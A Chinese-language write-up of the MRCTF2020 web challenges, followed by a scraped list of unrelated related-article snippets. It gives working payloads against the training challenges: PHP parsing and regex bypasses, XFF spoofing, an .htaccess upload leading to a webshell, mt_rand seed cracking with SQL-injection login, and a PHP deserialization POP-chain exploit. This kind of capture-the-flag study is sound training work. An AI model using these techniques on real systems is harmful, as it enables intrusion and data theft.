qtL0ng
qtL0ng

[MRCTF2020] - Web

前言:今天复现一下MRCTF的题并记录下
复现地址除了buuoj.cn还有ctf.merak.codes

文章目录

    • 套娃
    • PYWebsite
    • bypass
    • 你传你呢
    • Ezaudit
    • Ezpop

套娃

打开题目查看源码

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

$_SERVER['QUERY_STRING']指服务器请求时?后面的参数;具体见PHP超全局变量$ _SERVER
第一个if语句告诉我们参数不能匹配_%5f,但是第二个if语句要我们传参b_u_p_t,我们可以利用PHP的字符串解析特性Bypass,绕过方法:
b u p tb.u.p.t,当然理论上也可以用URL编码绕过,但不巧被过滤了;
第二个if正则匹配/^23333$/但又不能是23333,这种正则匹配,可以使用%0a换行绕过,第一层套娃成功绕过:
[MRCTF2020] - Web_第1张图片
打开得到的secrettw.php文件后查看源码:
[MRCTF2020] - Web_第2张图片
得到一串jsfuck编码,拿到Console运行得到
[MRCTF2020] - Web_第3张图片
随便POST传参一个值给Merak得到源码:

 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."
";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

首先看到已经包含了文件flag.php,下面一个change函数先不管,看下面的if语句要求我们ip为本地,并且GET一个参数,对于file_get_contents函数一般搭配php伪协议效果更佳,这里用data://伪协议绕过;最后echo file_get_contents(change($_GET['file']));要输出的文件无疑是flag.php,对于change函数我们写一个解密函数:


$v = 'flag.php';

function dechange($v) {
	$re = '';
	for ($i = 0; $i < strlen($v); $i++) {
		$re .= chr(ord($v[$i]) - $i * 2);
	}
	return base64_encode($re);
}
echo dechange($v);
//ZmpdYSZmXGI=

因此payload如下:

/secrettw.php?2333=data:text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=

再抓包改个ip得到flag
[MRCTF2020] - Web_第4张图片

PYWebsite

打开题目是一个网页,往下翻~
[MRCTF2020] - Web_第5张图片
一上来就PY,当然是不可能的,查看源码~
[MRCTF2020] - Web_第6张图片
通过前端进行交易,但是这个md5解不开,没法拿到授权码;但是看到了/flag.php,直接访问
[MRCTF2020] - Web_第7张图片
关键词IP圈起来要考,告诉我们验证逻辑是在后端,看来前端的授权码验证是假的;还告诉我们只有自己和购买者知道flag,那么就XFF伪造一下
[MRCTF2020] - Web_第8张图片

bypass

打开题目得到源码

I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&amp;&amp;isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) &amp;&amp; $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

MRCTF的签到题,审计一下代码:第一层,md5不能处理数组,用数组绕过;第二层,php弱类型
[MRCTF2020] - Web_第9张图片
在这里插入图片描述

你传你呢

文件上传,fuzz一下,发现后端有验证,应该是不能上传含有ph的文件,直接传是行不通了;不过上传漏洞就那几种,查看一下服务器是Apache,所以考虑.htaccess来解析jpg图片,首先上传一个.htaccess文件;
文件内容:

<FilesMatch "jpg"> 
    SetHandler application/x-httpd-php
</FilesMatch>

由于有MIME验证,所以上传时需要修改Content-Typeimage/jpeg,上传成功后再上传一个jpg后缀的木马,服务器会将.jpg格式的文件自动解析为.php文件从而绕过检测达到getshell目的。
[MRCTF2020] - Web_第10张图片
最后蚁剑连接:
[MRCTF2020] - Web_第11张图片
根目录找到flag。

Ezaudit

这道题主要考了源码泄露伪随机数代码审计
打开题目是一个网站,不过没用,直接扫描一下:
[MRCTF2020] - Web_第12张图片
下载下来得到index.php

 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "".$row["username"]."".$row["flag"]."";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

好家伙,看似这么长一段源码,其实过程很简单:
前半部分主要是验证密钥private_key,如果密钥正确就连接数据库查询flag,SQL语句没有什么过滤,构造一个简单的SQL查询布尔值true就能直接登录;
后半部分则是通过mt_rand()函数生成公私钥,并给出了公钥;
关于mt_rand()函数介绍,我们的目的是获取私钥,所以只能从mt_rand()函数下手

php默认运行模式下,一个进程第一次调用了该函数后(生成了第一个种子),后续只要是同一个进程对这个函数的请求,都会共享最初的种子

所以只要知道了种子,就能推出私钥;接下来通过php_mt_seed工具爆破种子,但先需要写个脚本,把给定的公钥KVQP0LdJKRaV3n9D还原成php_mt_seed参数的形式,才能用它爆破种子

# -*- coding: UTF-8 -*-
str1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2='KVQP0LdJKRaV3n9D'

length = len(str2)
res=''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
            break
print res

得到:

36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

把上面这串数字丢进php_mt_rand爆破:
[MRCTF2020] - Web_第13张图片
得到随机数种子:1775196155
再然后还是利用源码里的密钥生成函数计算出私钥:


mt_srand(1775196155);

function public_key($length = 16) {
	$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
	$public_key = '';
	for ($i = 0; $i < $length; $i++) {
		$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
	}

	return $public_key;
}

//genarate private_key
function private_key($length = 12) {
	$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
	$private_key = '';
	for ($i = 0; $i < $length; $i++) {
		$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
	}

	return $private_key;
}
echo public_key() . "\n";
echo private_key();

得到私钥:XuNhoueCDCGc
最后访问开始已经扫描出的login.html
用户名:crispr;密码直接上万能密码
[MRCTF2020] - Web_第14张图片
登录得到flag
[MRCTF2020] - Web_第15张图片

Ezpop

题目:

Welcome to index.php

//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."
";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

可以看到Modifier类中有文件包含,且提示flag在flag.php中,因此我们的目的是能够读到include(flag.php),虽然过滤了几个协议,但filter没被过滤。
只有3个类,从反序列化开始分析:

  1. 首先反序列化之后会触发__wakeup(),通过preg_match()$this->source做字符串比较,从而触发__toString()方法
  2. __toString()访问了strsource属性,这时如果我们让str等于Test类对象,由于Test中没有source属性,就会触发__get()方法。
  3. __get()方法将p作为函数使用,而我们再让$p等于Modifier类的话,__invoke()方法就会触发
  4. __invoke()调用了append()函数从而包含flag.php

exp:


class Modifier {
	protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show {
	public $source;
	public $str;
}
class Test {
	public $p;
}

$a = new Show();
$b = new Test();
$a->str = $b;
$b->p = new Modifier();
$a->source = $a;
$long = serialize($a);
echo urlencode($long);

传给pop参数,即可得到flag.php的base64,解码得到flag

你可能感兴趣的:(CTF-Web)

  • CTF-Web安全--SQL注入之Union注入详解 给我杯冰美式 Web安全--SQL注入web安全sql安全
    一、测试靶场与使用工具浏览器:火狐浏览器--Firefox靶场:sqli-labs使用插件:HackBar操作环境:phpstudy二、判断字符型注入与数字型注入操作步骤:1、用F12打开控制台,打开HackBar,LoarURL,将当前靶场的URL信息复制到操作台上2、输入?id=1,观察到页面发生变化,显示的是id=1时数据库中的信息,?是用来分割URL和查询字符串的,查询到了id=1时的用户
  • CTF web学习笔记 hiddenCarry CTF
    i春秋视频学习记录日常渗透测试(笔记)CTF学习记大佬的渗透测试记录web狗如何在CTF-web中的套路中实现反套路题目类型SQL注入SQL注入工具SQL解题思路SQL注入技巧XSSXSS注入工具XSS解题思路文件上传文件上传工具文件上传解题思路php特性PHP特性-工具php特性-解题思路php特性-伪协议后台登录类后台登录类-工具后台登录类解题思路加密解密类-考察知识点加解密类-工具加解密类-
  • CTF-WEB的知识体系 Ryongao 前端网络安全
    CTF概念CTF是CaptureTheFlag的缩写,中文一般译作夺旗赛CTF起源于1996年DEFCON全球黑客大会DEFCONCTF是全球技术水平和影响力最高的CTF竞赛竞赛模式解题模式:解决网络安全技术挑战(即找到flag),提交后获取相应分值。攻防赛模式:要求找到其他队伍的薄弱环节进行攻击,同时对自己的靶机环境进行加固防守。战争分享模式:由参赛队伍相互出题挑战。竞赛内容1.WEB:网络攻防
  • CTF-WEB的入门真题讲解 Ryongao 网络安全
    EzLogin第一眼看到这个题目我想着用SQL注入但是我们先看看具体的情况我们随便输入admin和密码发现他提升密码不正确我们查看源代码发现有二个不一样的第一个是base64意思Ihavanosql第二个可以看出来是16进制转化为weak通过发现是个弱口令canyouaccess如果是比赛本地是主办方的服务器本地访问不了它提示我们本地访问我们查看源代码发现就是一个很简单的html他过滤了X-For
  • CTF-WEB进阶与学习 Ryongao 网络安全
    PHP弱类型===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较==在进行比较的时候,会先将字符串类型转化成相同,再比较如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行转化规则字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0。e和E表示科学计数法md5绕过弱类型比较绕过弱类型比较绕过题目:$a!=
  • WEB攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀 @墨竹 前端安全php
    目录知识点详细点文件二次渲染php删除规则例题CTF-Web入门-162CTF-Web入门-163CTF-Web入门-164CTF-Web入门-165CTF-Web入门-166CTF-Web入门-167CTF-Web入门-168CTF-Web入门-169-170知识点1、文件上传-二次渲染2、文件上传-简单免杀变异3、文件上传-.htaccess妙用4、文件上传-PHP语言特性详细点1、检测层面:
  • CTF-WEB练习 YAy17 CTF安全学习网络安全web安全安全威胁分析
    [NISACTF2022]level-up首页内容如下:看源码发现disallow,于是想到了robots.txt:访问robots文件:出现level-2:通过POST方式请求两个参数;利用String强转类型要求两个变量值不相等,但是md5加密后的值强相等;因此这里不可以使用数组绕过~那就只能是使用md5碰撞!(PS:使用md5碰撞的时候,需要在数据包中直接改payload,如果利用的是hac
  • web服务器运维笔记,【服务器运维】docker部署CTF-web环境的学习笔记 AceHX web服务器运维笔记
    作者:G4br1elQQ:2063367671一、一键安装docker环境安装docker:curl-shttps://get.docker.com/|sh安装pip:curl-shttps://bootstrap.pypa.io/get-pip.py|python安装docker-compose:pipinstalldocker-compose二、docker部署CTF-web环境(如需搭建ct
  • CTF-web 常用软件安装及环境搭建 _潜心_ CTF网络安全web安全phppythonjava
    前言工欲善其事,必先利其器搭建web学习环境:Typora、phpStudy、python、SublimeText、AntSword、JDK1.8、BurpSuite此次安装是在虚拟机下的Windows10x64操作系统下进行。Typora简介官方网站:https://www.typora.io/Typora是一款支持实时预览的Markdown文本编辑器。Markdown是一种纯文本格式的标记语言
  • 经典ctf ping题目详解 青少年CTF-WEB-PingMe02 白猫a٩ CTF做题笔记前端服务器运维web安全安全网络安全linux
    题目环境:根据题目名称可知这是一道CTF-WEB方向常考的知识点:ping地址随便ping一个地址查看接受的数据包?ip=0.0.0.0有回显数据,尝试列出目录文件堆叠命令使用’;'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令使用堆叠命令列出此目录下的文件?ip=0.0.0.0;lsls是Linux系统里面的列出目录文件的命令索性ls没有被过滤查看隐藏文件?ip=0.0.0.0;l
  • i春秋-CTF-web文件上传 Sombra_Olivia I春秋CTF训练营web安全
    前言本来吧,悄悄摸鱼,想整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件上传练练。打开题目环境发现:好像是没有什么特别的。但是往下翻看却是别有洞天。众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。文件上传章节练习题.login-bo
  • ctf-web ch1762 ctf
    ctf-web信息搜集认证绕过SQL注入文件上传文件包含PHP代码审计信息搜集源码泄露页面源代码敏感文件泄漏备份文件(.swp/.bak/.beifen/~/phps等)[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)]数
  • ctf php文件上传图片格式,CTF-WEB:文件上传 燕仰 ctfphp文件上传图片格式
    文件上传一句话木马利用文件上传漏洞往目标网站中上传一句话木马,然后就可以在本地获取和控制整个网站目录。利用一句话木马进行入侵时需要满足木马上传成功未被查杀,知道木马的路径在哪并保证上传的木马能正常运行。一个简单的PHP一句话木马如下:@表示后面即使执行错误也不报错,eval()函数表示括号内的语句字符串什么的全都当做代码执行,$_POST['flag']表示从页面中获得flag这个参数值。上传过滤
  • CTF-WEB 文件上传绕过技巧 @NK 个人学习总结前端htmllinux运维
    1、前端javascript绕过#删除或者禁用js#BurpSuite抓包修改文件类型与文件头等信息2、后端检测——后缀名检测#黑名单:html/htm/php/php2/php3/php4/php5/phtml/pwml/inc/asp/aspx/ascx/jsp/cfm/cfc/pl/bat/exe/com/dll/vbs/js/reg/cgi/htaccess/.user.ini/asis/
  • ctf-web:关于文件上传漏洞的深入研究 薯片薯条 ctf-webphp
    上次我们研究了关于文件上传的漏洞,这次我们研究的内容属于上节课的补充内容,大约是关于文件上传的绕过与防御.怎么说呢,算是一种锻炼吧.因为下个月有个awd的比赛,因此最近会经常发一些关于web的内容.其实我还是挺慌的,因为以前参加的都是ctf线上赛,而且我做的都是逆向这个方面的,然而这次突然来了个web,搞得我有点懵.web也是最近才开始研究的,所以写的可能不尽人意,希望各位大佬看看就好,不喜勿喷.
  • CTF-web文件上传漏洞 彬彬有礼am_03 CTF基础
    文件上传漏洞文件上传功能文件上传流程和上传攻击WebShell——网页木马文件以php语言创建一句木马:之间的gok为连接的木马将其放入phpstudy工具的网站根目录里,即网址为http://10.0.3.23/eval.php利用菜刀连接木马打开后,右键添加右键->文件管理,可以看到里面的信息还可以模拟端右键->数据库管理大马介绍一句话木马介绍一句话木马连接文件上传漏洞利用登录后,点击File
  • CTF-Web(3)文件上传漏洞 Bug型程序员 网络安全网络协议web安全CTF
    笔记目录CTF-Web(2)SQL注入CTF-Web(3)文件上传漏洞1.WebShell介绍(1)一句话木马定义一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境,而一句话木马往往只有一行WebShell代码。作用:攻击获得网站控制权限查看、修改、删除网站数据通过提权漏洞可获得主机权限(2)一句话木马工作原理eval函数:把字符串按照PHP代码执行,该字符串必须是合法的P
  • CTF-Web(2)SQL注入 Bug型程序员 sql数据库网络安全安全web安全CTF系统安全
    笔记目录CTF-Web(2)SQL注入CTF-Web(3)文件上传漏洞1.注入介绍(1)原理①SQL注入如何注入Webshell1.目标存在sql注入漏洞,且已经获取目标的绝对路径2.并且通过探测发现目标能够进行数据的导入和导出操作,即secure_file_priv为空3.当前数据库是最高权限(即dba权限)4.利用Intooutfile()(写入文件的函数),向指定路径写入一句话木马5.web
  • 利用GitHub、docker部署CTF-web题目复现 白衣w CTF之WebKali
    前言前面写了kalilinux的docker安装以及在docker上部署搭建sqli-labs靶场,这篇文章简单介绍利用GitHub和docker简单搭建CTF-web题目进行复现学习记录环境准备这里有一个非常好的,实用的网站https://github.com/CTFTraining/CTFTraining里面包含了很多web题目,利用docker-compose搭建准备docker-compo
  • CTF网络安全题目个人导航【持续更新】 Hillain CTF-WEB安全RCE反序列化伪协议XXE网络安全SQL注入
    CTF-WEB导航WEBSQLRCE反序列化文件上传SSTIXXE综合WEBSQL[SWPUCTF2021新生赛]sql-联合注入[SWPUCTF2021新生赛]easy_sql-联合注入||报错注入||sqlmap[NSSRound#1Basic]sql_by_sql-二次注入+布尔盲注||sqlmap[NISACTF2022]join-us-报错注入&无列名注入[NISACTF20
  • 《CTFshow-Web入门》04. Web 31~40 镜坛主 phplinux网络
    Web入门索引web31题解原理web32题解原理web33题解web34题解web35题解web36题解web37题解原理web38题解原理web39题解web40题解原理ctf-web入门索引web31:eval()利用与正则绕过。web32:eval()利用与正则绕过。web33:eval()利用与正则绕过,PHP伪协议。web34:eval()利用与正则绕过,PHP伪协议。web35:ev
  • 《CTFshow-Web入门》10. Web 91~110 镜坛主 前端android安全
    Web入门索引web91题解总结web92题解总结web93题解web94题解web95题解web96题解web97题解web98题解web99题解总结web100题解web101题解web102题解web103题解web104题解web105题解总结web106题解web107题解web108题解web109题解web110题解ctf-web入门索引web91:PHP特性之preg_match(
  • CTF-Web小白入门篇超详细——了解CTF-Web基本题型及其解题方法 总结——包含例题的详细题解 日熙! #CTFweb零散积累CTFWeb入门篇CTFweb要学哪些知识CTFWeb基本题型
    很久之前经过一次比赛的打击,决定不能只是一直盲目的刷基础题,应该加快进度,从各种基本题型开始下手,每种题型都应该去找题目刷一刷,并做好总结。于是我去搜了一些总结的文章,便找到了一篇很好的,觉得看完后有点豁然开朗的感觉。所以本文是在该文章的基础上完善的,并且是准备一边学一边完善,所以有些地方我还没完全理解,日后会慢慢更新完善,欢迎各位大佬指教。本文参考链接:https://www.jianshu.c
  • 《CTFshow-Web入门》09. Web 81~90 镜坛主 前端
    Web入门索引web81题解web82题解原理web83题解web84题解web85题解web86题解web87题解原理web88题解web89题解web90题解ctf-web入门索引web81:include()利用,一句话木马之Nginx日志利用。web82~86:include()利用,条件竞争,利用session文件写入一句话木马。web87:file_put_contents()利用,伪
  • 【CTF-web】变量1(php全局变量) Sankkl1 ctf前端php开发语言
    题目链接:https://ctf.bugku.com/challenges/detail/id/76.html注意到$$args,那么我们可以通过args输入一个已定义变量的名称来得到它的值,于是查询php的九大全局变量,如下表所示。变量作用$_POST广泛用于收集提交method=“post”的HTML表单后的表单数据。$_POST也常用于传递变量。$_GET可用于收集提交HTML表单(meth
  • 【CTF-web】备份是个好习惯(查找备份文件、双写绕过、md5加密绕过) Sankkl1 ctf网络安全前端php
    题目链接:https://ctf.bugku.com/challenges/detail/id/83.html经过扫描可以找到index.php.bak备份文件,下载下来后打开发现是index.php的原代码,如下图所示。由代码可知我们要绕过md5加密,两数如果满足科学计数法的形式的话,php会将其当作科学计数法所得的数字来进行比较,根据该原理,如果两个md5码是0e开头且满足科学计数法的表示形式
  • 【CTF-web】修改请求头(XFF) Sankkl1 ctf网络协议网络安全
    题目链接:https://ctf.bugku.com/challenges/detail/id/79.html随意输入后可以看到需要本地管理员登录,得知这是一道需要修改XFF头的题。XFF即X-Forwarded-For,该请求标头是一个事实上的用于标识通过代理服务器连接到web服务器的客户端的原始IP地址的标头。我们可以通过伪造XFF头来假装本地登录,即在request头中加入X-Forward
  • ctf-web入门-php特性 whisper921 web安全安全
    web89intval()函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组涉及到了一个三目运算$_GET?$_GET=&$_POST:‘flag’;//如果使用GET传参,则使用POST传参来代替$_GET[‘flag’]==‘flag’?$_GET=&$_COOKIE:‘flag’;//如果GET传参flag的值=flag则将c
  • 《CTFshow - Web入门》05. Web 41~50 第三天使 WriteUp:CTFshow-Web入门python
    Web41~50web41知识点题解web42知识点题解web43知识点题解web44知识点题解web45知识点题解web46知识点题解web47题解web48题解web49知识点题解web50知识点题解ctf-web入门web41这一题参考了其他师傅的writeup:ctfshowweb入门web41CTFshowwbe41教你写脚本以及bilibili上的官方讲解:CTFshow-web入门-
  • CTF-Web基础题 weixin_52182264 CTF-web网络安全
    1.直接查看源代码(1)http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php2.查看HTTP请求或响应头(1)http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php(2)http://ctf1.shiyanbar.co
  • LeetCode[位运算] - #137 Single Number II Cwind javaAlgorithmLeetCode题解位运算
    原题链接:#137 Single Number II  要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现三次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间   难度:中等   分析: 与#136类似,都是考察位运算。不过出现两次的可以使用异或运算的特性 n XOR n = 0, n XOR 0 = n,即某一
  • 《JavaScript语言精粹》笔记 aijuans JavaScript
    0、JavaScript的简单数据类型包括数字、字符创、布尔值(true/false)、null和undefined值,其它值都是对象。 1、JavaScript只有一个数字类型,它在内部被表示为64位的浮点数。没有分离出整数,所以1和1.0的值相同。 2、NaN是一个数值,表示一个不能产生正常结果的运算结果。NaN不等于任何值,包括它本身。可以用函数isNaN(number)检测NaN,但是
  • 你应该更新的Java知识之常用程序库 Kai_Ge java
    在很多人眼中,Java 已经是一门垂垂老矣的语言,但并不妨碍 Java 世界依然在前进。如果你曾离开 Java,云游于其它世界,或是每日只在遗留代码中挣扎,或许是时候抬起头,看看老 Java 中的新东西。 Guava Guava[gwɑ:və],一句话,只要你做Java项目,就应该用Guava(Github)。 guava 是 Google 出品的一套 Java 核心库,在我看来,它甚至应该
  • HttpClient 120153216 httpclient
    /** * 可以传对象的请求转发,对象已流形式放入HTTP中 */ public static Object doPost(Map<String,Object> parmMap,String url) { Object object = null; HttpClient hc = new HttpClient(); String fullURL
  • Django model字段类型清单 2002wmj django
    Django 通过 models 实现数据库的创建、修改、删除等操作,本文为模型中一般常用的类型的清单,便于查询和使用: AutoField:一个自动递增的整型字段,添加记录时它会自动增长。你通常不需要直接使用这个字段;如果你不指定主键的话,系统会自动添加一个主键字段到你的model。(参阅自动主键字段) BooleanField:布尔字段,管理工具里会自动将其描述为checkbox。 Cha
  • 在SQLSERVER中查找消耗CPU最多的SQL 357029540 SQL Server
    返回消耗CPU数目最多的10条语句 SELECT TOP 10    total_worker_time/execution_count AS avg_cpu_cost, plan_handle,    execution_count,    (SELECT SUBSTRING(text, statement_start_of
  • Myeclipse项目无法部署,Undefined exploded archive location 7454103 eclipseMyEclipse
    做个备忘! 错误信息为:       Undefined exploded archive location 原因:           在工程转移过程中,导致工程的配置文件出错; 解决方法:    
  • GMT时间格式转换 adminjun GMT时间转换
    普通的时间转换问题我这里就不再罗嗦了,我想大家应该都会那种低级的转换问题吧,现在我向大家总结一下如何转换GMT时间格式,这种格式的转换方法网上还不是很多,所以有必要总结一下,也算给有需要的朋友一个小小的帮助啦。 1、可以使用 SimpleDateFormat SimpleDateFormat    EEE-三位星期 d-天 MMM-月 yyyy-四位年
  • Oracle数据库新装连接串问题 aijuans oracle数据库
    割接新装了数据库,客户端登陆无问题,apache/cgi-bin程序有问题,sqlnet.log日志如下: Fatal NI connect error 12170.   VERSION INFORMATION:         TNS for Linux: Version 10.2.0.4.0 - Product
  • 回顾java数组复制 ayaoxinchao java数组
    在写这篇文章之前,也看了一些别人写的,基本上都是大同小异。文章是对java数组复制基础知识的回顾,算是作为学习笔记,供以后自己翻阅。首先,简单想一下这个问题:为什么要复制数组?我的个人理解:在我们在利用一个数组时,在每一次使用,我们都希望它的值是初始值。这时我们就要对数组进行复制,以达到原始数组值的安全性。java数组复制大致分为3种方式:①for循环方式 ②clone方式 ③arrayCopy方
  • java web会话监听并使用spring注入 bewithme Java Web
            在java web应用中,当你想在建立会话或移除会话时,让系统做某些事情,比如说,统计在线用户,每当有用户登录时,或退出时,那么可以用下面这个监听器来监听。        import java.util.ArrayList; import java.ut
  • NoSQL数据库之Redis数据库管理(Redis的常用命令及高级应用) bijian1013 redis数据库NoSQL
    一 .Redis常用命令         Redis提供了丰富的命令对数据库和各种数据库类型进行操作,这些命令可以在Linux终端使用。         a.键值相关命令         b.服务器相关命令 1.键值相关命令       &
  • java枚举序列化问题 bingyingao java枚举序列化
    对象在网络中传输离不开序列化和反序列化。而如果序列化的对象中有枚举值就要特别注意一些发布兼容问题: 1.加一个枚举值 新机器代码读分布式缓存中老对象,没有问题,不会抛异常。 老机器代码读分布式缓存中新对像,反序列化会中断,所以在所有机器发布完成之前要避免出现新对象,或者提前让老机器拥有新增枚举的jar。 2.删一个枚举值 新机器代码读分布式缓存中老对象,反序列
  • 【Spark七十八】Spark Kyro序列化 bit1129 spark
    当使用SparkContext的saveAsObjectFile方法将对象序列化到文件,以及通过objectFile方法将对象从文件反序列出来的时候,Spark默认使用Java的序列化以及反序列化机制,通常情况下,这种序列化机制是很低效的,Spark支持使用Kyro作为对象的序列化和反序列化机制,序列化的速度比java更快,但是使用Kyro时要注意,Kyro目前还是有些bug。 Spark
  • Hybridizing OO and Functional Design bookjovi erlanghaskell
      推荐博文: Tell Above, and Ask Below - Hybridizing OO and Functional Design 文章中把OO和FP讲的深入透彻,里面把smalltalk和haskell作为典型的两种编程范式代表语言,此点本人极为同意,smalltalk可以说是最能体现OO设计的面向对象语言,smalltalk的作者Alan kay也是OO的最早先驱,
  • Java-Collections Framework学习与总结-HashMap BrokenDreams Collections
            开发中常常会用到这样一种数据结构,根据一个关键字,找到所需的信息。这个过程有点像查字典,拿到一个key,去字典表中查找对应的value。Java1.0版本提供了这样的类java.util.Dictionary(抽象类),基本上支持字典表的操作。后来引入了Map接口,更好的描述的这种数据结构。  &nb
  • 读《研磨设计模式》-代码笔记-职责链模式-Chain Of Responsibility bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 业务逻辑:项目经理只能处理500以下的费用申请,部门经理是1000,总经理不设限。简单起见,只同意“Tom”的申请 * bylijinnan */ abstract class Handler { /*
  • Android中启动外部程序 cherishLC android
    1、启动外部程序 引用自: http://blog.csdn.net/linxcool/article/details/7692374 //方法一 Intent intent=new Intent(); //包名 包名+类名(全路径) intent.setClassName("com.linxcool", "com.linxcool.PlaneActi
  • summary_keep_rate coollyj SUM
    BEGIN /*DECLARE minDate varchar(20) ; DECLARE maxDate varchar(20) ;*/ DECLARE stkDate varchar(20) ; DECLARE done int default -1; /* 游标中 注册服务器地址 */ DE
  • hadoop hdfs 添加数据目录出错 daizj hadoophdfs扩容
